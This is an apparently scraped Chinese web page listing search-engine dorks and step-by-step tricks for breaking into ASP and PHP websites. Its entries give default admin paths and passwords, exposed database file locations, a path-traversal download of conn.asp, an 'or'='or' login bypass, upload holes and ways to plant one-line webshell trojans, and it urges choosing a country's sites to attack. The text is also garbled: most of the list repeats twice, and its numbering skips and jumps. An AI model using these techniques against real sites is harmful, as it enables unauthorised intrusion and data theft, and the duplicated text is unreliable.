拿站常用關鍵字
阿新 • • 發佈:2019-01-06
1、到GoogLe,搜尋一些關鍵字,edit.asp? 韓國肉雞為多,多數為mssql資料庫!
2、到Google ,site:cq.cn inurl:asp
3、利用挖掘雞和一個asp木馬. 檔名是login.asp 路徑l_keylink" href="http://www.chkh.com/Article/List_43.html">asp登陸,如未註冊成為會員! upLoad_bm1.asp和upLoad_c1.asp這兩個隨便選個,一般管理員都忽視了這2漏洞
6、預設資料庫地址blogdata/acblog.asa 關鍵字:acblog
7、百度 /htdocs 註冊裡可以直接上傳asa檔案!
8、/Database/#newasp.mdb 關鍵詞:Newasp SiteManageSystem Version
9、用挖掘機 關鍵字:Powered by WEBBOY 頁面:/upfile.asp
10. baidu中搜索關鍵字Ver5.0 Build 0519 (存在上傳漏洞)
11. Upfile_Article.asp bbs/upfile.asp 輸入關鍵字:powered by mypower ,
12. inurl:winnt\system32\inetsrv\ 在google裡面輸入這個就可以找到很多網站
13. 現在GOOGLE搜尋關鍵字 intitle:網站小助手 inurl:asp
14. 鍵字: 首頁 最新動態 新手指南 舞曲音樂 下載中心 經典文章 玩家風采 裝備購買 站內流言 友情連線 本站論壇挖掘雞的關鍵字 添 setup.asp
15. VBulletin論壇的資料庫預設資料庫地址! /includes/functions.php 工具: 1.網站獵手 下載地址:百度 Google! 2.Google 關鍵字: Powered by: vBulletin Version 3.0.1 Powered by: vBulletin Version 3.0.2 Powered by: vBulletin Version 3.0.3 其中一個就可以了
16. 1.開啟百度或GOOGLE搜尋,輸入powered by comersus asp shopping cart open source。 這是一個商場系統。 2.網站的最底部分,有個 Comersus Open Technologies LC。開啟看下~~comersus系統~ 猜到,comersus.mdb. 是資料庫名資料庫都是放在database/ 後的, 所以database/comersus.mdb comersus_listCategoriesTree.asp換成database/comersus.mdb,不能下載。那樣把前一個 ''store/''除去,再加上database/comersus.mdb 試試
17. 無憂傳奇官方站點程式。 1、後臺管理地址:http://您的域名/msmiradmin/ 2、預設後臺管理帳號:msmir 3、預設後臺管理密碼:msmirmsmir 資料庫檔案為 http://您的域名/msmirdata/msmirArticle.mdb 資料庫連線檔案為 ***********/Conn.asp
18. 百度裡輸入/skins/default/
19. 利用挖掘機關鍵機:power by Discuz 路徑:/wish.php 配合: Discuz!論壇 wish.php遠端包含漏洞 工具使用
20. 上傳漏洞. 工具 : Domain3.5 網站獵手 1.5版關鍵字powered by mypower 檢測的頁面或檔案插入upfile_photo.asp
21. 新雲漏洞這個漏洞ACCESS和SQL版通吃。 Google搜尋關鍵字 "關於本站 - 網站幫助 - 廣告合作 - 下載宣告 - 友情連線 - 網站地圖 - 管理登入" 把flash/downfile.asp?url=uploadfile/../../conn.asp提交到網站根目錄。就可以下載conn.asp 以原始碼,軟體等下載站居多。大家時常碰到資料庫如果前面或者中間+了# 可以用%23替換就可以下載了 \database\%23newasp.mdb 如:#xzws.mdb 改成%23xzws.mdb
22. 通吃所有商城+動力上傳系統使用工具:挖掘雞 v1.1 明小子商城入侵: 關鍵字:選購->加入購物車->去收銀臺->確認收貨人資訊->選付款方式->選配送方式->線上支付或下單後匯款 ->匯款確認->發貨->完成漏洞頁面:upload.asp upfile_flash.asp 動力入侵: 關鍵字:powered by mypower 漏洞頁面:upfile_photo.asp Upfile_Soft.asp upfile_adpic.asp upfile_softpic.asp
23、動易列目錄 admin_articlerecyclebin.asp inurl:admin_articlerecyclebin.asp
24、工具:網站獵手關鍵詞:inurl:Went.asp 字尾:manage/login.asp 口令:'or'='or'
25、入侵魔獸私服需要的工具:asp木馬一隻。 Domain3.5明小子關鍵字:All Right Reserved Design:遊戲聯盟後臺地址:admin/login.asp 資料庫的地址:chngame/#chngame.mdb
26、漏洞是利用管理員iis設定的失誤用baidu 關鍵字就是比較罕見的指令碼名動網: ReloadForumCache.asp Leadbbs: makealltopanc.asp BBSXP: admin_fso.asp 動易: admin_articlerecyclebin.asp
27、國外站的爆庫漏洞關鍵字:sad Raven's Guestbook 密碼地址:/passwd.dat 後臺地址:/admin.php
28、 關鍵字:尚奈克斯後臺路徑/system/manage.asp 直接傳asp木馬
29、 工具 1:網站獵手 2:大馬一個關鍵字:切勿關閉Cookies功能,否則您將不能登入插入diy.asp
30、關鍵字:Team5 Studio All rights reserved 預設資料庫:data/team.mdb
31. 工具: 挖掘機 輔臣資料庫讀取器關鍵字: 企業簡介 產品展示 產品列表字尾新增: /database/myszw.mdb 後臺地址: admin/Login.asp
32. 關鍵子 XXX inurl:Nclass.asp 在"系統設定"裡寫個木馬。會被儲存到 在 config.asp內。
33. 不進後臺照樣拿動網WEBSHELL data.asp?action=BackupData 動網資料庫備份預設路徑 36. 工具:網站獵手 WebShell 關鍵字:inurl:Went.asp 字尾:manage/login.asp 弱口令:'or'='or'
34、 入侵雷池新聞釋出系統關鍵字:leichinews 去掉leichinews後面的. 打上:admin/uploadPic.asp?actionType=mod&picName=xuanran.asp 再上傳馬..... 進訪問uppic anran.asp 登陸馬.
35. 一、通過GOOGLE搜尋找大量注入點關鍵字:asp?id=1 gov.jp/ asp?id= 頁數:100 語言:想入侵哪個國家就填什麼語言吧
36. 關鍵字:Powered by:94KKBBS 2005 利用密碼找回功能 找回admin 提問:ddddd 回答:ddddd
37. 關鍵字:****** inurl:readnews.asp 把最後一個/改成%5c ,直接暴庫,看密碼,進後臺隨便添加個新聞 在標題輸入我們的一句話木馬
38. 工具:一句話木馬 BBsXp 5.0 sp1 管理員猜解器關鍵詞:powered by bbsxp5.00 進後臺,備份一句話馬!
39. 關鍵字:程式核心:BJXSHOP網上開店專家 後臺:/admin
2、到Google ,site:cq.cn inurl:asp
3、利用挖掘雞和一個asp木馬. 檔名是login.asp 路徑l_keylink" href="http://www.chkh.com/Article/List_43.html">asp登陸,如未註冊成為會員! upLoad_bm1.asp和upLoad_c1.asp這兩個隨便選個,一般管理員都忽視了這2漏洞
6、預設資料庫地址blogdata/acblog.asa 關鍵字:acblog
7、百度 /htdocs 註冊裡可以直接上傳asa檔案!
8、/Database/#newasp.mdb 關鍵詞:Newasp SiteManageSystem Version
9、用挖掘機 關鍵字:Powered by WEBBOY 頁面:/upfile.asp
10. baidu中搜索關鍵字Ver5.0 Build 0519 (存在上傳漏洞)
11. Upfile_Article.asp bbs/upfile.asp 輸入關鍵字:powered by mypower ,
12. inurl:winnt\system32\inetsrv\ 在google裡面輸入這個就可以找到很多網站
13. 現在GOOGLE搜尋關鍵字 intitle:網站小助手 inurl:asp
14. 鍵字: 首頁 最新動態 新手指南 舞曲音樂 下載中心 經典文章 玩家風采 裝備購買 站內流言 友情連線 本站論壇挖掘雞的關鍵字 添 setup.asp
15. VBulletin論壇的資料庫預設資料庫地址! /includes/functions.php 工具: 1.網站獵手 下載地址:百度 Google! 2.Google 關鍵字: Powered by: vBulletin Version 3.0.1 Powered by: vBulletin Version 3.0.2 Powered by: vBulletin Version 3.0.3 其中一個就可以了
16. 1.開啟百度或GOOGLE搜尋,輸入powered by comersus asp shopping cart open source。 這是一個商場系統。 2.網站的最底部分,有個 Comersus Open Technologies LC。開啟看下~~comersus系統~ 猜到,comersus.mdb. 是資料庫名資料庫都是放在database/ 後的, 所以database/comersus.mdb comersus_listCategoriesTree.asp換成database/comersus.mdb,不能下載。那樣把前一個 ''store/''除去,再加上database/comersus.mdb 試試
17. 無憂傳奇官方站點程式。 1、後臺管理地址:http://您的域名/msmiradmin/ 2、預設後臺管理帳號:msmir 3、預設後臺管理密碼:msmirmsmir 資料庫檔案為 http://您的域名/msmirdata/msmirArticle.mdb 資料庫連線檔案為 ***********/Conn.asp
18. 百度裡輸入/skins/default/
19. 利用挖掘機關鍵機:power by Discuz 路徑:/wish.php 配合: Discuz!論壇 wish.php遠端包含漏洞 工具使用
20. 上傳漏洞. 工具 : Domain3.5 網站獵手 1.5版關鍵字powered by mypower 檢測的頁面或檔案插入upfile_photo.asp
21. 新雲漏洞這個漏洞ACCESS和SQL版通吃。 Google搜尋關鍵字 "關於本站 - 網站幫助 - 廣告合作 - 下載宣告 - 友情連線 - 網站地圖 - 管理登入" 把flash/downfile.asp?url=uploadfile/../../conn.asp提交到網站根目錄。就可以下載conn.asp 以原始碼,軟體等下載站居多。大家時常碰到資料庫如果前面或者中間+了# 可以用%23替換就可以下載了 \database\%23newasp.mdb 如:#xzws.mdb 改成%23xzws.mdb
22. 通吃所有商城+動力上傳系統使用工具:挖掘雞 v1.1 明小子商城入侵: 關鍵字:選購->加入購物車->去收銀臺->確認收貨人資訊->選付款方式->選配送方式->線上支付或下單後匯款 ->匯款確認->發貨->完成漏洞頁面:upload.asp upfile_flash.asp 動力入侵: 關鍵字:powered by mypower 漏洞頁面:upfile_photo.asp Upfile_Soft.asp upfile_adpic.asp upfile_softpic.asp
23、動易列目錄 admin_articlerecyclebin.asp inurl:admin_articlerecyclebin.asp
24、工具:網站獵手關鍵詞:inurl:Went.asp 字尾:manage/login.asp 口令:'or'='or'
25、入侵魔獸私服需要的工具:asp木馬一隻。 Domain3.5明小子關鍵字:All Right Reserved Design:遊戲聯盟後臺地址:admin/login.asp 資料庫的地址:chngame/#chngame.mdb
26、漏洞是利用管理員iis設定的失誤用baidu 關鍵字就是比較罕見的指令碼名動網: ReloadForumCache.asp Leadbbs: makealltopanc.asp BBSXP: admin_fso.asp 動易: admin_articlerecyclebin.asp
27、國外站的爆庫漏洞關鍵字:sad Raven's Guestbook 密碼地址:/passwd.dat 後臺地址:/admin.php
28、 關鍵字:尚奈克斯後臺路徑/system/manage.asp 直接傳asp木馬
29、 工具 1:網站獵手 2:大馬一個關鍵字:切勿關閉Cookies功能,否則您將不能登入插入diy.asp
30、關鍵字:Team5 Studio All rights reserved 預設資料庫:data/team.mdb
31. 工具: 挖掘機 輔臣資料庫讀取器關鍵字: 企業簡介 產品展示 產品列表字尾新增: /database/myszw.mdb 後臺地址: admin/Login.asp
32. 關鍵子 XXX inurl:Nclass.asp 在"系統設定"裡寫個木馬。會被儲存到 在 config.asp內。
33. 不進後臺照樣拿動網WEBSHELL data.asp?action=BackupData 動網資料庫備份預設路徑 36. 工具:網站獵手 WebShell 關鍵字:inurl:Went.asp 字尾:manage/login.asp 弱口令:'or'='or'
34、 入侵雷池新聞釋出系統關鍵字:leichinews 去掉leichinews後面的. 打上:admin/uploadPic.asp?actionType=mod&picName=xuanran.asp 再上傳馬..... 進訪問uppic anran.asp 登陸馬.
35. 一、通過GOOGLE搜尋找大量注入點關鍵字:asp?id=1 gov.jp/ asp?id= 頁數:100 語言:想入侵哪個國家就填什麼語言吧
36. 關鍵字:Powered by:94KKBBS 2005 利用密碼找回功能 找回admin 提問:ddddd 回答:ddddd
37. 關鍵字:****** inurl:readnews.asp 把最後一個/改成%5c ,直接暴庫,看密碼,進後臺隨便添加個新聞 在標題輸入我們的一句話木馬
38. 工具:一句話木馬 BBsXp 5.0 sp1 管理員猜解器關鍵詞:powered by bbsxp5.00 進後臺,備份一句話馬!
39. 關鍵字:程式核心:BJXSHOP網上開店專家 後臺:/admin